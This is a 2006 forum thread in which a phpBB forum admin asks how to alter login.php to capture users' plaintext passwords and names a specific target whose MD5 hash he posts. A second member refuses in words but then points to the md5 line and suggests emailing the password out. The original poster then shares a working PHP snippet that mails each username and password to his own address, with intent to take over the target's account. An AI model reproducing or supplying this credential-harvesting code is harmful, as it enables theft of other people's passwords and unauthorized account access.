|
|
|
|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 101
Members: 0
Total: 101
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
Modifying login.php to get PW |
|
Posted: Sat Dec 02, 2006 6:39 pm |
|
|
supw00t |
Beginner |
|
|
Joined: Dec 02, 2006 |
Posts: 2 |
|
|
|
|
|
|
|
Sup men,
it should be very easy as the host and admin of a phpBB forum to just replace the original login.php-form with a modified one, which sends the entered password of the user to somewhere (a file, a seperated sql db entry,...), before its hash is calculated and checked, isn't it?
Well I thought about trying something like that, but I have crappy no idea of coding with php and also didn't find a useful file in the www, so can you help me?
It should be only the few lines of code which I can paste into the login.php file and upload it to the space. Sounds like the easiest way of getting a pw, if you expect that the pw of the target person has 12 or 13 letters where you fucking die while bruteforcing
unfortunately, for its hash (679b256ff4fa182638046fede0a3401b) I didn't find an entry in a database
So long, stay hacked,
me. |
|
|
|
|
|
|
|
|
Posted: Sat Dec 02, 2006 8:27 pm |
|
|
Chb |
Valuable expert |
|
|
Joined: Jul 23, 2005 |
Posts: 206 |
Location: Germany |
|
|
|
|
|
|
First of all: I will not tell you how to change the code.
Coding in PHP for your purpose is very easy. I advise you to let the script send you an email with the password.
You should find the right line in the login.php when searching for 'md5('. Then, take a look at this. Do not ask 'How to?'. Read (e.g. on php.net), search and then ask. |
|
|
|
|
Posted: Sat Dec 02, 2006 8:28 pm |
|
|
supw00t |
Beginner |
|
|
Joined: Dec 02, 2006 |
Posts: 2 |
|
|
|
|
|
|
|
lol that was the fuck easier than i thought ^^
Quote: | $username = isset($HTTP_POST_VARS['username']) ? phpbb_clean_username($HTTP_POST_VARS['username']) : '';
$password = isset($HTTP_POST_VARS['password']) ? $HTTP_POST_VARS['password'] : '';
mail('mymailadress',$username,$password); |
now i'll get this weener |
|
|
|
|
www.waraxe.us Forum Index -> PhpBB
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|